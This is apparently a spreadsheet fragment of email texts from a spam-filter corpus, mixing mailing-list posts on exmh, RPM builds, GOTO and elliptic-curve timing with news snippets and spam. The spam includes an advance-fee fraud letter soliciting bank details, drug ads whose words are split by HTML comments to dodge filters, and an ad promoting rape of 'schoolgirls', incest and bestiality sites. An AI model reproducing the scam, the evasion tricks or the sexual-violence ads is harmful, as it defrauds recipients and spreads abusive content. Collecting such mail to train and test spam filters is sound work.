 Just one more info. I measured the time spent wrapping the stuff in 
 Ftoc_Next with time {} so the data is for real. One difference 
 between mine and Valdis' setup (judging from his trace) is that I use 
 the address book. I've been doing that for ages so that can't be the 
 problem.
 Is there a way to get the log to print time with higher granularity?
 /A
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Curling videogame hits bigtime
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85528813
 Date: Not supplied
 [IMG: http://www.craphound.com/images/curlinggame.jpg] An Alberta teenager has 
 hit the bigtime with a curling videogame. Friends of mine who curl assure me 
 that curling is way fun to play (it certainly isn't that fun to watch!) and, of 
 course, you can (and should!) drink beer while playing. I believe that 
 disqualifies it as a sport, no? Link[1] Discuss[2] (_Thaanks, Chris!_) 
 [1] http://rtnews.globetechnology.com/servlet/ArticleNews/tech/RTGAM/20021004/gtcurl/Technology/techBN/
 [2] http://www.quicktopic.com/boing/H/nNRRa5nAStdq
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Sony gets handed a set back in Ausyland
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.abc.net.au/news/justin/weekly/newsnat-26jul2002-53.htm
 PlayStation owners win copyright case
 Owners of PlayStation consoles who modify their machines to play games
 bought overseas have had a win in the Federal Court.
 Sony Computer Entertainment has failed in its claim that "chipping" breaks
 copyright laws.
 Sony launched legal proceedings against a Sydney man, Eddy Stevens, for
 allegedly selling pirated games and also providing and installing
 modification chips.
 PlayStation consoles in Australia are different from those in the US and
 Japan because of the different television formats.
 The court was told "chipping" allows people to play legitimately bought
 overseas games and copies of games, but also pirated games.
 The judgement by Federal Court Justice Ronald Sackville says Sony failed
 to prove that PlayStation consoles have a copyright protection measure
 installed in the first place and therefore could not rule that a mod chip
 breaks copyright legislation.
 Mr Stevens was found to have infringed trademark rules in relation to the
 pirated games he sold a matter which will come before the court again next
 month.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SA] URGENT HELP..............
</t>
  </si>
  <si>
    <t xml:space="preserve">--===_SecAtt_000_1fnapngoonxcrm
 Content-Type: text/plain; charset="us-ascii"
 Content-Transfer-Encoding: quoted-printable
 DEAR SIR=2C
 URGENT AND CONFIDENTIAL=3A
 Re=3ATransfer of $50=2C000=2E000=2E00 USD=5BFIFTY MILLION UNITED
 STATES DOLLARS=5D=2E
 WE WANT TO TRANSFER TO OVERSEAS=5B$50=2C000=2E000=2E00=5BFIFTY
 MILLION UNITED STATES DOLLARS=5DFROM A SECURITY COMPANY
 IN SPAIN=2CI WANT TO ASK YOU TO QUIETLY LOOK FOR A
 RELIABLE AND HONEST PERSON WHO WILL BE CAPABLE AND FIT
 TO PROVIDE EITHER AN EXISTING BANK ACCOUNT OR TO SET
 UP A NEW BANK ACCOUNT IMMEDIATELY TO RECEIVE THIS
 MONEY=2CEVEN AN EMPTY ACCOUNT CAN SERVE TO RECEIVE THIS
 MONEY=2CAS LONG AS YOU WILL REMAIN HONEST TO ME TILL THE
 END OF THIS IMPORTANT BUSINESS TRANSACTION=2EI WANT TO
 BELIEVE THAT YOU WILL NEVER LET ME DOWN EITHER NOW OR
 IN FUTURE=2E
 I AM DOUGLAS SMITH=2CTHE AUDITOR GENERAL OF MAGNUM TRUST
 INC=2E MADRID SPAIN DURING THE COURSE OF OUR AUDITING=2CI DISCOVERED A
 FLOATING FUND IN AN ACCOUNT OPENED IN THE SECURITY
 COMPANY IN 1990 AND SINCE 1993 NOBODY HAS OPERATED ON
 THIS ACCOUNT AGAIN=2C AFTER GOING THROUGH SOME OLD FILES
 IN THE RECORDS I DISCOVERED THAT THE OWNER OF THE
 ACCOUNT DIED WITHOUT A HEIR HENCE THE MONEY IS
 FLOATING AND IF I DO NOT REMIT THIS MONEY OUT
 URGENTLY=2CIT WILL BE FORFEITED FOR NOTHING=2E
 THE OWNER OF THIS ACCOUNT WAS =22MR=2EALLAN P=2E SEAMAN=22=2CA FOREIGNER AND AN INDUSTRIALIST=2CAND HE DIED SINCE 1993 AND NO OTHER PERSON KNOWS ABOUT THIS ACCOUNT OR ANYTHING CONCERNING IT=2CTHE ACCOUNT HAS NO BENEFICIARY AND MY INVESTIGATION PROVED TO ME AS WELL THAT ALLAN=2EP SEAMAN UNTILL HIS DEATH WAS THE MANAGER DIAMOND SAFARI=5BPTY=5DS=2EA=2E
 WE WILL START THE FIRST TRANSFER WITH $20 MILLION
 DOLLARS=5BTWENTY MILLION DOLLARS=5DUPON SUCCESSFUL
 TRANSFER WITHOUT ANY DISAPPOINTMENT FROM YOUR SIDE=2CWE
 SHALL RE-APPLY FOR THE TRANSFER OF THE REMAINING $30
 MILLION USA DOLLARS=5BTHIRTY MILLION UNITED STATES
 DOLLARS=5DINTO YOUR ACCOUNT BRINGING THE SUM TOTAL TO
 $50=2C000=2E000=2E00=5BFIFTY MILLION DOLLARS=5D=2E
 I AM CONTACTING YOU AS A FOREIGNER BECAUSE THIS MONEY
 CAN ONLY BE APPROVED TO A FOREIGNER WITH VALID
 INTERNATIONAL PASSPORT=2CDRIVERS LICENCE AND FOREIGN
 ACCOUNT BECAUSE THE MONEY IS IN USA DOLLARS AND THE
 FORMER OWNER OF THE ACCOUNT=22MR=2EALLAN P=2ESEAMAN IS A
 FOREIGNER=2EI WILL LIKE US TO MEET FACE TO FACE TO SIGN
 A BINDING AGREEMENT THAT WILL BIND US TOGETHER IN THE
 BUSINESS=2CI AM REVEALING ALL THESE TO YOU WITH THE
 BELIEF THAT YOU WILL NEVER LET ME DOWN IN THIS
 BUSINESS=2CYOU ARE THE FIRST AND ONLY PERSON I AM
 CONTACTING FOR THE BUSINESS=2CSO PLEASE REPLY URGENTLY
 FOR ME TO TELL YOU THE NEXT STEP TO TAKE=2EYOU SHOULD
 FORWARD YOUR TELEPHONE AND FAX NUMBERS AND YOUR BANK
 ACCOUNT DETAILS THAT WILL BE USED IN TRANSFERING THE
 MONEY=2E
 YOU WILL HAVE TO GIVE ME THE ASSURANCE WHEN WE
 MEET THAT THIS MONEY WILL BE INTACT PENDING OUR
 PHYSICAL ARRIVAL IN YOUR COUNTRY FOR SHARING AND
 DISBURSEMENT OF THE FUND WHICH WILL BE 35% FOR YOUR
 ASSISTANCE=2C60% WILL BE FOR US WHILE 5% WILL  BE SET
 ASIDE TO TAKE CARE OF ALL THE EXPENSES THAT WILL BE
 INCURRED BY BOTH PARTIES DURING THE COURSE OF THE
 TRANSFER=2E
 I LOOK FORWARD TO YOUR EARLIEST RESPONSE=2CALL
 CORRESPONDENCE FOR NOW SHOULD BE EMAIL FOR SECURITY
 REASONS=2E
 BEST REGARDS=2E
 DOUGLAS SMITH  =28PLEASE  CONTACT ME THROUGH  MY WIFE EMAIL=28princessmar001=40yahoo=2Ecom=29FOR CONFIDENCAIL
 --===_SecAtt_000_1fnapngoonxcrm
 Content-Type: application/octet-stream; name="aaaaaaa.txt"
 Content-Transfer-Encoding: base64
 Content-Disposition: attachment; filename="aaaaaaa.txt"
 --===_SecAtt_000_1fnapngoonxcrm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</si>
  <si>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The Needle and the damage done
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;From the Hoax or Hack Dept:
 Digital Needle - A Virtual Gramophone , a reported method to scan yourr
 old LPs on a flat bed scanner and then use the resulting images to make
 MP3's of the fine playing conatined therein. Its all still sketchy to the
 point of possible hoaxdom, but the idea is dang interesting.
 http://www.cs.huji.ac.il/~springer/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: K3B
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; `athalon-redhat-linux': machine `athalon-redhat' not recognized
 &gt; configure: error: /bin/sh admin/config.sub athalon-redhat-linux failed
 &gt; error: Bad exit status from /home/dale/rpmbuild/tmp/rpm-tmp.26673
 &gt; (%prep)
 Woah ;) did you tweak some flags yourself, like default rpm flags ? What 
 dist are you running ? I don't think there's an athalon-redhat-linux 
 machine as standard ;) it should be some permutation of athlon and linux, 
 and without redhat, but I can't tell for sure.   Any idea where your 
 system might be setting this flag ?
  &gt; RPM build errors:
 &gt;     user jkeating does not exist - using root
 &gt;     group jkeating does not exist - using root
 &gt;     user jkeating does not exist - using root
 &gt;     group jkeating does not exist - using root
 &gt;     Bad exit status from /home/dale/rpmbuild/tmp/rpm-tmp.26673 (%prep)
 looks like the files are owned by the wrong user (ie the original spec 
 builder).
 Thomas
 -- 
 The Dave/Dina Project : future TV today ! - http://davedina.apestaart.org/
 &lt;-*-                      -*-&gt;
 Goodbye
 I've finally arrived
 &lt;-*- thomas@apestaart.org -*-&gt;
 URGent, the best radio on the Internet - 24/7 ! - http://urgent.rug.ac.be/
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: HOME REPS WANTED-FORTUNE 500 COMP HIRING
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Question?
 Do you want a different job?
 Do you want to be your own boss?
 Do you need extra income?
 Do you need to start a new life?
 Does your current job seem to go nowhere?
 If you answered yes to these questions, then here is your solution.
 We are a fortune 500 company looking for motivated individuals who are 
 looking
 to a substantial income working from home.
 Thousands of individual are currently do this RIGHT NOW.
 So if you are looking to be employed at home, with a career that will
 provide you vast opportunities and a substantial income, please fill
 out our online information request form here now:
 http://ter.netblah.com:27000
 To miss out on this opportunity, click here
 http://ter.netblah.com:27000/remove.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Cobain dispute settled
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8418829,215/
 Date: 2002-10-01T04:33:55+01:00
 *Arts:* The long-running dispute between the widow of Kurt Cobain and the 
 remaining two members of his band Nirvana has been settled, paving the way for 
 a new CD.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Life Insurance - Pennies a day! -- FREE Quote djdam
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Interesting. I've always wondered about things 'considered' to be bad. 
 &gt; Example the GOTO, most languages support a goto of some sort, so are gotos really bad?
 Oh goodie. My final year project rears its head :-)
 &gt; Is a loop or a recursive call actually any better than a goto 
 &gt; or is the goto used as a kind of common enemy of 
 &gt; programming syntax
 Much as I would like to answer an unqualified "yes", I must admit: if 
 you already code in a style that makes heavy use of GOTOs, coding in the 
 same style with GOSUBs or function calls does not improve code. Much the 
 same as when the manuals on "modular coding" said to write modules that 
 would fit on a single sheet of computer paper, lots of coders proceeded 
 to split their code into arbitrary 60-line chunks. :)
 However, "Go-to considered harmful" points out that to analyse (==debug) 
 code, you need to be able to tell what the point of execution is, and 
 what the values of the variables are at that point. This is an easy(tm) 
 job if the code uses assignment, if(), for() and functions, but not if 
 it uses GOTO. (See http://www.cs.utexas.edu/users/EWD/ewd02xx/EWD215.PDF 
 for the full letter).
 Despite being one of Dijkstra's brain-damaged children who learned BASIC 
 at an early age :) I never use GOTO anymore (or any of its bastard 
 offspring like break, continue, fudged function calls with sleight of 
 hand in the variables). My code is longer than it might be if I had used 
 GOTO at a critical, handy point. However, code is a bit like networks - 
 you always end up adding bits on where you didn't expect to - and the 
 benefit is felt when another person (like myself but in three months 
 time) is modifying or debugging it and doesn't have to go through the 
 hassle of dealing with the impact of the GOTO.
 Dave
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; Looks like your ham corpus by and large has To: jeremy@alum.mit.edu in
 &gt; a header while your spam corpus by and large doesn't.  But this one
 &gt; does.
 Interestingly, for me, one of the highest value spam indicators was
 the name of the mail host that the spam was delivered to, in the To:
 line. So mail to info@gin.elax2.ekorp.com was pretty much a dead cert
 for the filters.
 -- 
 Anthony Baxter     &lt;anthony@interlink.com.au&gt;   
 It's never too late to have a happy childhood.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: yyyy,Introducing HGH: The Most Powerful Anti-Obesity Drug Ever
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;body bgColor="#CCCCCC" topmargin=1 onMouseOver="window.status=''; return true" oncontextmenu="return false" ondragstart="return false" onselectstart="return false"&gt;
 &lt;div align="center"&gt;Hello, jm@netnoteinc.com&lt;BR&gt;&lt;BR&gt;
 &lt;/div&gt;&lt;div align="center"&gt;&lt;/div&gt;&lt;p align="center"&gt;&lt;b&gt;&lt;font face="Arial" size="4"&gt;Hum&lt;!--jm--&gt;an 
 Gro&lt;!--jm--&gt;wth 
 Hor&lt;!--jm--&gt;mone 
 Ther&lt;!--jm--&gt;apy&lt;/font&gt;
 &lt;/b&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;b&gt;&lt;font face="Arial" size="4"&gt;Lo&lt;!--jm--&gt;se 
 wei&lt;!--jm--&gt;ght while 
 buil&lt;!--jm--&gt;ding 
 le&lt;!--jm--&gt;an 
 mus&lt;!--jm--&gt;cle 
 mass&lt;br&gt;and 
 rever&lt;!--jm--&gt;sing the 
 ravag&lt;!--jm--&gt;es of 
 ag&lt;!--jm--&gt;ing all at once.&lt;/font&gt;&lt;font face="Arial" size="3"&gt;&lt;br&gt;
 &lt;/font&gt;&lt;/b&gt;&lt;font face="Arial" size="3"&gt; &lt;br&gt;Remar&lt;!--jm--&gt;kable 
 discov&lt;!--jm--&gt;eries about 
 Hum&lt;!--jm--&gt;an 
 Gro&lt;!--jm--&gt;wth 
 Hormo&lt;!--jm--&gt;nes 
 (&lt;b&gt;HG&lt;!--jm--&gt;H&lt;/b&gt;) 
 &lt;br&gt;are changing the way we think about ag&lt;!--jm--&gt;ing and 
 wei&lt;!--jm--&gt;ght 
 lo&lt;!--jm--&gt;ss.&lt;/font&gt;&lt;/p&gt;
 &lt;center&gt;&lt;table width="481"&gt;&lt;tr&gt;&lt;td height="2" width="247"&gt;&lt;p align="left"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="3"&gt;L&lt;!--jm--&gt;ose 
 Wei&lt;!--jm--&gt;ght&lt;br&gt;
 Bui&lt;!--jm--&gt;ld 
 Mus&lt;!--jm--&gt;cle Tone&lt;br&gt;
 Re&lt;!--jm--&gt;verse 
 Agi&lt;!--jm--&gt;ng&lt;br&gt;
 Increas&lt;!--jm--&gt;ed 
 Lib&lt;!--jm--&gt;ido&lt;br&gt;
 Dura&lt;!--jm--&gt;tion Of 
 Pen&lt;!--jm--&gt;ile 
 Erect&lt;!--jm--&gt;ion&lt;br&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;&lt;/td&gt;&lt;td height="2" width="222"&gt;&lt;p align="left"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="3"&gt;
 Healt&lt;!--jm--&gt;hier 
 Bon&lt;!--jm--&gt;es&lt;br&gt;
 Impr&lt;!--jm--&gt;oved 
 Memo&lt;!--jm--&gt;ry&lt;br&gt;
 Impr&lt;!--jm--&gt;oved skin&lt;br&gt;
 New Hair Gr&lt;!--jm--&gt;owth&lt;br&gt;
 Wri&lt;!--jm--&gt;nkle 
 Disap&lt;!--jm--&gt;pearance &lt;/font&gt;&lt;/b&gt;&lt;/p&gt;&lt;/td&gt;&lt;/table&gt;&lt;/center&gt;&lt;p align="center"&gt;&lt;a href="http://64.123.160.91:81/li/naturalhgh1/"&gt;&lt;font face="Arial" size="4"&gt;&lt;b&gt;Visit 
 Our Web Si&lt;!--jm--&gt;te 
 and Learn The Fa&lt;!--yyyy--&gt;cts: Click Here&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;&lt;div align="center"&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;BR&gt;
 You are rece&lt;!--jm--&gt;iving this email as a 
 subscr&lt;!--jm--&gt;iber&lt;br&gt;to the 
 Opt&lt;!--jm--&gt;-In 
 Ameri&lt;!--jm--&gt;ca 
 Mailin&lt;!--jm--&gt;g 
 Lis&lt;!--jm--&gt;t. &lt;br&gt;
 To remo&lt;!--jm--&gt;ve 
 your&lt;!--jm--&gt;self from all related 
 mailli&lt;!--me--&gt;sts,&lt;br&gt;just &lt;a href="http://64.123.160.91:81/li/naturalhgh/remove.php?userid=jm@netnoteinc.com"&gt;Click Here&lt;/a&gt;&lt;/div&gt;&lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Hello Unlimited International Telephone Call Marketer,
 If you ordered a flat-rate domestic calling product or a 20 minute free trial using a local access number, your service will be operating in about 24-48 hours or on your designated trial date and time.  Please try dialing the access number you found on your reseller's web page at:
 http://www.internationalfreecall.com
 If you ordered a flat-rate domestic calling product using a 1-800 toll-free access number, your service will be operating within 1-2 work days.
 Please try dialing 1-866-865-4548.
 In either case, when your service is switched on, you will hear a voice ask you to dial the number you are calling.
 You must dial 1+area code+7 digit number followed by # to make any calls: local or long distance.
 Example - To call www.internationalfreecall.com, you would dial the following after dialing your access number and listening for the voice:
 1-410-608-8178# 
 Please use this service for all your calling and you will never pay more than your monthly fee again. There are no taxes or surcharges, so dial away!
 Finally, I recommend entering the access number into your speed dial settings on your telephone.  This will make your service quicker and easier to use, and thus more enjoyable.
 If you have any questions, please contact us for more information.
 In addition, if you need product enhancements like 3-way calling, portable calling cards, international calling products, or marketing tools, please visit:
 http://www.internationalfreecall.com
 In the meantime, the other network on this free calling promotion is OPEX, which is offering 100 minutes of free long distance for trying their program.  
 Opex's usual rates are 4.5 cents per minute for domestic calls, with great international rates, too!
 For more information on OPEX, or to sign up, please click below:
 http://cognigen.net/opex/main.cgi?lietuva
 To unsubscribe from this mailing list, please click on:
 http://www.internationalfreecall.com/cgi-bin/aefs/subscribe.cgi?user=info&amp;listid=1.list&amp;id=1543
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Excellent Tim Biskup card deck
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85538898
 Date: Not supplied
 [IMG: http://boingboing.net/Images/luckystack1.jpg]Tim Biskup is an artist who 
 does a lot of work for animation studios. His work is inspired by one of my 
 favorite illustrators, Jim Flora. Tim's selling a deck of poker cards, each 
 with a different illo, and they look terrific. Lots of whimsical monsters and 
 happy monkeys and weird prehistoric plants. I pre-ordered my deck just now. 
 Hurry, only 2500 decks will be printed! Link[1] Discuss[2]
 [1] http://www.timbiskup.com/timsite/timpages/luckystack.html
 [2] http://www.quicktopic.com/17/H/6E5eribTLCzLD
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] A New Theory on Mapping the New World
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.washingtonpost.com/wp-dyn/articles/A46455-2002Oct5.html
 A New Theory on Mapping the New World
 By Guy Gugliotta
 Washington Post Staff Writer
 Monday, October 7, 2002; Page A07
 In 1507, a group of scholars working in France produced an extraordinary map
 of the world, the first to put the still-recent discoveries of Columbus and
 others into a new continent separate from Asia, and to call that continent
 "America." With the Waldseemuller map, the New World was born.
 But there was something else. What would later come to be called South
 America and Central America were surprisingly well-shaped, not only on the
 east coast, where explorers had already sailed, but also on the west coast
 -- which no European was known to have seen.
 The ice cream cone bulge that sticks out into the Pacific at the junction of
 modern-day Chile and Peru is readily visible and in almost exactly the right
 geographical spot -- not only in the main map, but also in an inset printed
 along its top.
 The shape of South America in the main map appears distorted because of the
 curvature of the Earth.
 It is an improbable coincidence, if it was a coincidence, for the map -- 12
 large printed pages to be arrayed in one 36-square-foot wall display -- was
 published six years before Vasco Balboa's 1513 trip across the Isthmus of
 Panama and 12 years before Ferdinand Magellan's 1519-22 trip around the
 world.
 Did someone get there earlier?
 ...
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: A biblical digression
</t>
  </si>
  <si>
    <t xml:space="preserve">John Hall:
 &gt;Ran across a site which claimed to explain the original meaning of the
 &gt;Ten Commandments.  It seems some of those meanings have evolved a bit, too.
 You mean that "Thou shalt not covet thy neighbour's ass" used to be
 about donkeys???  Inconceivable!!!
 R
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Condemned man picks a black olive for his last meal. Green olives
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8272608,1717/
 Date: 2002-09-26T11:26:10+01:00
 [IMG: http://www.newsisfree.com/Images/fark/cleveland.gif ([Cleveland])]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Elliptic Curve Point Counting, made easy
</t>
  </si>
  <si>
    <t xml:space="preserve">Here are some numbers with the new algorithm for counting points on
 elliptic curves (over fields of characteristic 2).
 In 1998, Reynald Lercier set a record at 1663 bits in 330 days of CPU
 on 266 MHz Alphas.  In 1999, Frederik Vercauteren set a record at 1999
 bits in 65 days of CPU on 400 MHz PCs.
 I've been working on the problem since then.  These were measured just
 now on Rajit's 750 MHz Alpha:
   1009 bits:
     Lift:  4.8 s + 0.64 s precomputation.
     Norm:  2.6 s + 0.31 s precomputation.
   1663 bits:
     Lift: 18.5 s + 2.1 s precomputation.
     Norm:  7.0 s + 1.9 s precomputation.
   1999 bits:
     Lift: 29.4 s + 3.6 s precomputation.
     Norm: 16.6 s + 3.4 s precomputation.
   15013 bits:
     Lift: 1 h 39 m + 13 m precomputation
     Norm: 39 m + 1 h 41 m precomputation
 Bye,
   Rob.
      .-.                    Robert.Harley@argote.ch                    .-.
     /   \           .-.      Software Development       .-.           /   \
    /     \         /   \       .-.     _     .-.       /   \         /     \
   /       \       /     \     /   \   / \   /   \     /     \       /       \
  /         \     /       \   /     `-'   `-'     \   /       \     /         \
             \   /         `-'       ArgoTech      `-'         \   /
              `-'                http://argote.ch/              `-'
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Day, when dreams come true!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;style type="text/css"&gt;
 &lt;!--
 a {  text-decoration: none }
 --&gt;
 &lt;/style&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFCC" text="#000000"&gt;
 &lt;table width="100%" border="0" cellpadding="4"&gt;
   &lt;tr&gt; 
     &lt;td bgcolor="#996633" align="center"&gt; 
       &lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#FFFFFF"&gt;Hello 
         &lt;b&gt;valued member&lt;/b&gt;! We are happy to present to you our great offer!&lt;br&gt;
         Brand bew collection of &lt;b&gt;top rated sites&lt;/b&gt;!&lt;br&gt;
         Each include &lt;b&gt;3&lt;/b&gt; &lt;b&gt;sites&lt;/b&gt; at &lt;b&gt;cost of 1&lt;/b&gt;!&lt;br&gt;
         &lt;b&gt;Exclusive content&lt;/b&gt; and &lt;b&gt;regulary updates&lt;/b&gt; is garanteed!&lt;/font&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td align="center"&gt; 
       &lt;a href="http://www.zoo-3in1.com/?revshare=017dfc9e"&gt;&lt;font color="#33CC00" face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font size="5"&gt;Animals&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
         Sex with dogs, horses, pigs and more other.....&lt;/font&gt;&lt;/a&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td align="center"&gt;
 	&lt;a href="http://www.rapemux.com/?revshare=017dfc9e"&gt;
       &lt;font color="#CC3333" face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font size="5"&gt;Brutal 
         Rape&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
         World of violence and cruelty. Raped schoolgirls, housewifes and other 
         sweet beaches.&lt;/font&gt;&lt;/a&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td align="center"&gt; 
 	&lt;a href="http://www.incest-3in1.com/?revshare=017dfc9e"&gt;
       &lt;font color="#0066FF" face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font size="5"&gt;Incest&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
         Home of parental sex. No censorship. No limits.&lt;/font&gt;&lt;/a&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td align="center"&gt; 
 	&lt;a href="http://www.anime-3in1.com/?revshare=017dfc9e"&gt;
       &lt;font color="#FF9900" face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font size="5"&gt;Anime&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
         All famous artist is worked for you. Only qualuty comics, pics and full 
         length movies. &lt;/font&gt;&lt;/a&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td align="center"&gt;&lt;br&gt;
       &lt;b&gt;&lt;font size="4" color="#000000" face="Verdana, Arial, Helvetica, sans-serif"&gt;Just 
         CLICK to offer interesting to YOU !&lt;/font&gt;&lt;/b&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Slim Factors&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;style type="text/css"&gt;
 &lt;!--
 .t {  font-family: "Times New Roman", Times, serif; font-size: 12px; color: #000000}
 --&gt;
 &lt;/style&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF"&gt;
 &lt;table width="556" border="0" cellspacing="0" cellpadding="0" align="center"&gt;
   &lt;tr&gt; 
     &lt;td colspan="3"&gt;&lt;img src="http://global.zenmarketing.net/c/images/slim/a.jpg" width="556" height="76"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td&gt;&lt;img src="http://global.zenmarketing.net/c/images/slim/b.jpg" width="150" height="165"&gt;&lt;/td&gt;
     &lt;td&gt;&lt;img src="http://global.zenmarketing.net/c/images/slim/c.jpg" width="161" height="165"&gt;&lt;/td&gt;
     &lt;td&gt;&lt;img src="http://global.zenmarketing.net/c/images/slim/d.jpg" width="245" height="165"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td colspan="2"&gt;&lt;img src="http://global.zenmarketing.net/c/images/slim/e.jpg" width="311" height="125" usemap="#Map" border="0"&gt;&lt;map name="Map"&gt;&lt;area shape="rect" coords="4,61,108,121" href="http://global.zenmarketing.net/s_link.php?nURL=http://www.slimfactors.net&amp;email=zzzz@spamassassin.taint.org" alt="Slim Factors - A totally new approach to weight loss" title="Slim Factors - A totally new approach to weight loss"&gt;&lt;/map&gt;&lt;/td&gt;
     &lt;td&gt;&lt;a href="http://global.zenmarketing.net/s_link.php?nURL=http://immunetree.com/showprod.php?ID=6&amp;email=zzzz@spamassassin.taint.org"&gt;&lt;img src="http://global.zenmarketing.net/c/images/slim/f.jpg" width="245" height="125" alt="Buy Slim Factors Now" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td colspan="3"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td colspan="3" class="t"&gt;This e-mail is intended to be a benefit to the recipient. 
       If you would like to opt-out and not receive any more &lt;a href="http://global.zenmarketing.net/unsub.php?email=zzzz@spamassassin.taint.org&amp;name=Friend"&gt;click 
       here&lt;/a&gt;. Your address will be removed immediately. We sincerely apologize 
       for any inconvenience. This E-mail is not SPAM under the Federal Regulatory 
       laws of the United States. This message is being sent to you in compliance 
       with the proposed Federal Legislation for commercial e-mail (H.R.4176-SECTION 
       101 PARAGRAPH (e) (1) (A)) and Bill s.1618 TITLE III passed by the 105th 
       US Congress. This message is not intended for residents of WA, NV, CA, VA. 
       Screening of addresses has been done to the best of our technical ability. 
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Outstanding Opportunities for "Premier Producers"
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_8531F_01C234BE.5332BD60
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
  Outstanding Opportunities for "Premier Producers"=09
  =09
  =09
  Our Client's Search includes:=0A=
 Full-Time Agents=0A=
 Sales Managers=0A=
 General
 Agents=0A=
 CPA Partners=0A=
 Independant Agents=09
  Imagine=09
  =09
  Plus access to 385 other companies=09
 For A Confidential Phone Interview Please Complete Form &amp; Submit
 Name: 	 =09
 E-mail: 	 =09
 Phone: 	 =09
 City:	  	State:	  =09
 Area of Interest:	  	Full-Time Agent	  	Sales Manager
 General Agent	=20
  	  	CPA "Partner"	  	Independent Agent
  	    	 =09
 =20
 We don't want anybody to receive or mailing who does not wish to receive
 them. This is professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.Insurancemail.net=20
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt;=20
